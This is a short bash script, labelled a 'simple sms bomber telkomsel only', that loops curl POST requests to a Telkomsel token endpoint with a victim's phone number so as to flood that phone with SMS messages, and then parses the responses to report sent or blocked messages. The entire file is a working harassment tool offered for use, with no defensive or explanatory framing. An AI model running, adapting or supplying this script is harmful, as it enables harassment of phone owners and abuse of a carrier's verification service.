#!/bin/bash
#coded by amos

cat <<EOF

          __  __ _  __     _        
         |  \/  | |/ /__ _| |_ ___  
         | |\/| |   // _  | __/ _ \ 
         | |  | |   \ (_| | || (_) |
         |_|  |_|_|\_\__._|\__\___/ 
                                    
            [+] Amos Siregar [+]
      simple sms bomber telkomsel only
EOF
nope='0812xxx'

for (( i = 0; i < 10; i++ )); do
	check=`curl -s -i 'https://mobi.telkomsel.com/ulang/token' --data-binary 'msisdn='$nope'' --compressed -D -`
	#echo $check >> status.txt
	server="$(echo "$check" | grep -c 'HTTP/1.1 200')"
	if [[ $server != 0 ]]; then
		ok="$(echo "$check" | grep -c 'status":"1')"
		blok="$(echo "$check" | grep -c 'status":"3')"
		if [[ $blok == 1 ]]; then
			printf "SMS BLOCKED to $nope \n"
		elif [[ $ok == 1 ]]; then
				idc="$(echo "$check" | awk -F[:,] '{print $4}' | xargs)"
				printf "SMS Success to $nope token= $idc \n"
		else
			printf "Masukin nomor yg valid \n"
		fi
	fi
done
